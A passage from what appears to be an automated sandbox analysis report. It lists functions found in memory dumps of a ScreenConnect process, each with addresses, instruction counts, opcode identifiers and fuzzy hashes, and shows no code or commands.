                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9639faf7ebf9657e65877a3c8e56fda2e78522b70b5f450310a90000187e055f
                                                                                                                                                                                                                                          • Instruction ID: 48dfee05b85eefac59b5dda5bce1e0cbb3e4b54c3da03cf88a0fc917b8a36b29
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9639faf7ebf9657e65877a3c8e56fda2e78522b70b5f450310a90000187e055f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04218471A002099FDB00DF69DC819EEBBB5FFC8210B10852AE5099B365EB35ED05CBD1
                                                                                                                                                                                                                                          Function 044D47E0 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c4b9c856b93aa2c66db32f84323ef67dbdfd36bd3fb26050c49fcc4297292338
                                                                                                                                                                                                                                          • Instruction ID: 9638447655f2705c9b3b4b4660d669676c3424db31315ce396d1ef9cb25f0fb8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4b9c856b93aa2c66db32f84323ef67dbdfd36bd3fb26050c49fcc4297292338
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4214C35E406198FDF18DFA8D964ADEBBF1AF89310F00446AE106AB374DB74AC41CB90
                                                                                                                                                                                                                                          Function 044D5430 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: cbf035d2a91936efa31f7975ba21fc4665581f70bb7ac75dc2c1a748f8ca974f
                                                                                                                                                                                                                                          • Instruction ID: 211d5c9d18975847eccbf1ccde7f25c79f953017d88ec64d923d8fd2a2c4a5d6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cbf035d2a91936efa31f7975ba21fc4665581f70bb7ac75dc2c1a748f8ca974f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 542126B0A013149FC710DF68C562AAA7FF0EF46321F1581AAD055CB3A2DB30E8038B91
                                                                                                                                                                                                                                          Function 044D1838 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a115d730df80c767faa63e2256de2dbfb138ab3b3b869b0952d487eed77050d8
                                                                                                                                                                                                                                          • Instruction ID: 1c831a555756d0e4d1390fdb8a439f0193c897f7195d38c30f61617fff0d3063
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a115d730df80c767faa63e2256de2dbfb138ab3b3b869b0952d487eed77050d8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF21C2303403019FD314EF64E880E99BB6AFFD9344B00863AD5054B265DB75BC0ACBE0
                                                                                                                                                                                                                                          Function 01F4E188 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f43a949c5580e62548bc329a7205bd60e62fc4090d1d53eba583df27528acc1a
                                                                                                                                                                                                                                          • Instruction ID: b0c21f8f2431b35e735e5e99c97a930b839a79c761675f2d26e9aa1d5492f19e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f43a949c5580e62548bc329a7205bd60e62fc4090d1d53eba583df27528acc1a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E21F3316006058FDB00DF68EC828EDBBB5FF85210B10C26AD2499B365DB35AD06CFD1
                                                                                                                                                                                                                                          Function 01F4E09F Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 47138ce277ec09dacaf56d6fba891233bf86bdfccd9e8bbd67cebbd5fa9645aa
                                                                                                                                                                                                                                          • Instruction ID: 3a5312ed13e01b6a9b2053e21574bb513009c09fcd24e8a1512ff953c693f9d6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47138ce277ec09dacaf56d6fba891233bf86bdfccd9e8bbd67cebbd5fa9645aa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C115C30A402059FEB24CF58C999AEEBBF5EF89304F14445AE406B7395DB7A9D01CB91
                                                                                                                                                                                                                                          Function 06351660 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3300604123.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_6350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f3162fa5da4f3d35f6b8844ff6906919b8222ce21d37cf609525c3592f6751a5
                                                                                                                                                                                                                                          • Instruction ID: 097397dde9fd994ed63c2349d4773ea251ab993b935316f72e13abfe03df3734
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3162fa5da4f3d35f6b8844ff6906919b8222ce21d37cf609525c3592f6751a5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91115B76B012149FCB44EB7DC89157EB6E6EF886507584039E809EB344EE39ED028BE0
                                                                                                                                                                                                                                          Function 01F436A0 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e453aea59b9c5d81c077ea9029a898ce0246e7746dc628233c1e355c14b1a9a4
                                                                                                                                                                                                                                          • Instruction ID: 09791fa013cb8aa920b8919963b213d6d500161fcbcfc05681069ea721123946
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e453aea59b9c5d81c077ea9029a898ce0246e7746dc628233c1e355c14b1a9a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE21E1B5E00226CFCB24DF68D9484AEBFB1FF89225714816AD91AD7354EB36DC02CB51
                                                                                                                                                                                                                                          Function 01F4F898 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0b60836cdd516dc5dc27a5d1a1e10fd9362faad6084796d2046099ddcea57cb1
                                                                                                                                                                                                                                          • Instruction ID: 7f56ef76cf515bbb3b1bb02cd60c9c680a4ceb9e9627a3aca4c30909a41b777e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b60836cdd516dc5dc27a5d1a1e10fd9362faad6084796d2046099ddcea57cb1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C12125B6C00249DFDB10CF9AC884ADEBFB5FB88320F148519E919A7211C339A556DFA1
                                                                                                                                                                                                                                          Function 01F486F0 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3437d0643997f8b9c3274f633251d7ebf72f3da9d514af6f5c0aa03bf88d9ef9
                                                                                                                                                                                                                                          • Instruction ID: 38a5ba88977b88f3fe8b14eb905d4e67657b38adbe943a5dd9de9b2dc3f106fe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3437d0643997f8b9c3274f633251d7ebf72f3da9d514af6f5c0aa03bf88d9ef9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79217A30600605CFD734CF6AC85499ABBF1EF88360B148A2CD592976A0DB32E95ACF90
                                                                                                                                                                                                                                          Function 01F4ED88 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d968a1ae67027aa4e336723c91a39605881b0c8efed6973b37daca8ec97d9a34
                                                                                                                                                                                                                                          • Instruction ID: b30b8c99892e66392c562f9b5e72077f880dd19a32e428cf2cce33a04e0d838f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d968a1ae67027aa4e336723c91a39605881b0c8efed6973b37daca8ec97d9a34
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45214C31D10B0A8ECB11EFB8D8505EEFBB0EF99210B11C62AD598A7111FB7092968781
                                                                                                                                                                                                                                          Function 044D1C50 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 14aa7dc4d1bcb5753035d9f7d3179e31e0e5985f52e8aefa64da4e7ad6f80d0d
                                                                                                                                                                                                                                          • Instruction ID: 18e7f623635f5cdf6c05d0c2b5398b25899a4ef50c87e21950ccd2a43471cd0c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14aa7dc4d1bcb5753035d9f7d3179e31e0e5985f52e8aefa64da4e7ad6f80d0d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C42192B4F401099FDB05DFA8E8A989EBB71FF85204B1444EAD605B7360EB34AD16CF91
                                                                                                                                                                                                                                          Function 044D46E8 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1abc07a0f253e290276b2a4f30864275dde0b369bc9415a3250ef9ffb9e1cdbe
                                                                                                                                                                                                                                          • Instruction ID: a8f54a991b858e01c72b92f0318b8a6b19e3b5fc3f5dae6719c1be1a37f4417a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1abc07a0f253e290276b2a4f30864275dde0b369bc9415a3250ef9ffb9e1cdbe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 500128763493444FC715977CEC614DD7FB5DF8726038240A7C44ACF263E528594787A2
                                                                                                                                                                                                                                          Function 01F4A7D8 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3d8e79a97167fde8504e04f21abb3bb70446279e9bd9a834a5308b609ee17f14
                                                                                                                                                                                                                                          • Instruction ID: 208b04acea5faee069ea32774a5b4ebb7fa415ba489dd755cd7e4c089a138929
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d8e79a97167fde8504e04f21abb3bb70446279e9bd9a834a5308b609ee17f14
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D210770A40705CFE734DF29D844A6ABBF5FF88310B148A2CD5AB87695E731E902CB90
                                                                                                                                                                                                                                          Function 01F48C50 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ae9582150baf0e2754fc0d3d0966b5a3aca61eb131be42243328364878860d08
                                                                                                                                                                                                                                          • Instruction ID: e1fdea2c3aceaba695c7aeea5eb10862e715ded85de798f11616228efa63983a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae9582150baf0e2754fc0d3d0966b5a3aca61eb131be42243328364878860d08
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC11E2707001016BEB04EB69D890A6EB7A6EFD8600F10892ED505EB368DF34BD0987D1
                                                                                                                                                                                                                                          Function 01F4F8A0 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c535d2369ac7058bdbf69841c9dd2283392c75024e9614fe120d2764aa17a5f2
                                                                                                                                                                                                                                          • Instruction ID: 3dc973d7ec3c0de7a7b017c196c51c98074ee04ab81278efe10c3d265bc69416
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c535d2369ac7058bdbf69841c9dd2283392c75024e9614fe120d2764aa17a5f2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0021F3B6C002499FDB10CF9AC844ADEBFB5FB88310F148429E919A7210C339A555DFA1
                                                                                                                                                                                                                                          Function 044D2657 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9c0acbc6752119d6e5259a9c85895c90a8ac6fed3fbf1fd2273a11e82846ba48
                                                                                                                                                                                                                                          • Instruction ID: 14657340e735cb6068c4dadf76ba93af864ea656835f08a1e3eb2195198a6eb4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c0acbc6752119d6e5259a9c85895c90a8ac6fed3fbf1fd2273a11e82846ba48
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C11E131B106014BCB14AA6C9CA495EEBE9FFC9654700806FD409CB36AEB70EC0683D1
                                                                                                                                                                                                                                          Function 01F4E1C8 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a5197577ed8f5eb417c380112c2ee2ab237091713aee305dbfe354422c25e4a2
                                                                                                                                                                                                                                          • Instruction ID: 6c49521bea73a955e74005798683f6ae85a5ab314691dae30263b6f6842c25e8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5197577ed8f5eb417c380112c2ee2ab237091713aee305dbfe354422c25e4a2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B114270B002099FDB04DF69D8819AEBBB9FFC8210B10852AE519AB364DB35ED05CBD4
                                                                                                                                                                                                                                          Function 01F48AC0 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e369dfd5f29b862fbf6acafdfc6107d0b06fdc0151045c9137ef344d79ccf3d7
                                                                                                                                                                                                                                          • Instruction ID: 3705a822997ad3b4b6553d2b01f05a5f6d4b4486e6c3d130a5feafb9103406b9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e369dfd5f29b862fbf6acafdfc6107d0b06fdc0151045c9137ef344d79ccf3d7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68114275A0010A9FCB01DFA8D9809DEBBF1FF49314B11806AD505FB261D772AE0ACB90
                                                                                                                                                                                                                                          Function 01F4D4E1 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3a69627703e27668f8129a68ea037ca9c2dace4b2d0bfce21278815a0096a0d0
                                                                                                                                                                                                                                          • Instruction ID: ca7220439a1c0c1a924fa99a80807e3b1ec2c7e322c13c4b1d21555c156ead09
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a69627703e27668f8129a68ea037ca9c2dace4b2d0bfce21278815a0096a0d0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B01D871705B440FD3159A68ACC98DA7FB8DF962643054267D804CB2A2EA65DD4BC3E2
                                                                                                                                                                                                                                          Function 01F491C8 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5df2d232433e52fb918dbb49b49d3eb4a0c7329b92b74c31aae0be259cc54900
                                                                                                                                                                                                                                          • Instruction ID: 7b9b834c3fd89a65ace939bdbd2e4f4616547d1a9bd00d9aa32869b201795301
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5df2d232433e52fb918dbb49b49d3eb4a0c7329b92b74c31aae0be259cc54900
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6110E71F00204AFDB11CAADC840AEBBBB6FFC8300F1480AAD554C7154D3B28A42CB80
                                                                                                                                                                                                                                          Function 01F4FA92 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 773b3331f2d4c88caf21d1e992a2adb88a78cd9659d6e23da0fb0fd32007ba50
                                                                                                                                                                                                                                          • Instruction ID: 34525d47b89a509cb9675554e40fe84092291cc8486bc15196860a6885aa8064
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 773b3331f2d4c88caf21d1e992a2adb88a78cd9659d6e23da0fb0fd32007ba50
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D60192BB7015008F8304DB6DB4948A9F7E6FBD9265314807BE509CB361DA729C178754
                                                                                                                                                                                                                                          Function 01F4481C Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c006a688068733cc70363146be2e7d9505ef75efbc25d7515c127ac5d0e2e59e
                                                                                                                                                                                                                                          • Instruction ID: c548432ad0df706b7a2bd0cc8877ae57777e66c009ab3810d878a78b1f3734c3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c006a688068733cc70363146be2e7d9505ef75efbc25d7515c127ac5d0e2e59e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA2103B6C006099FDB20DF9AC444BEEFBF5EB48320F14842AE918A7250D379A545CFA5
                                                                                                                                                                                                                                          Function 044D1C60 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3388f29e82561aff13fbdc96a2c2c2b5653760d912b2fae9e94eacac4853f731
                                                                                                                                                                                                                                          • Instruction ID: 1af10ecea29e83d786441b2de47e9ebe17eb93162710302a5ba81ba35d672c91
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3388f29e82561aff13fbdc96a2c2c2b5653760d912b2fae9e94eacac4853f731
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F82190B0F4010A9FDB04DFA8D46885EBBB6FF88204F1444A9D605B7364EB34AD05CF91
                                                                                                                                                                                                                                          Function 0143D683 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
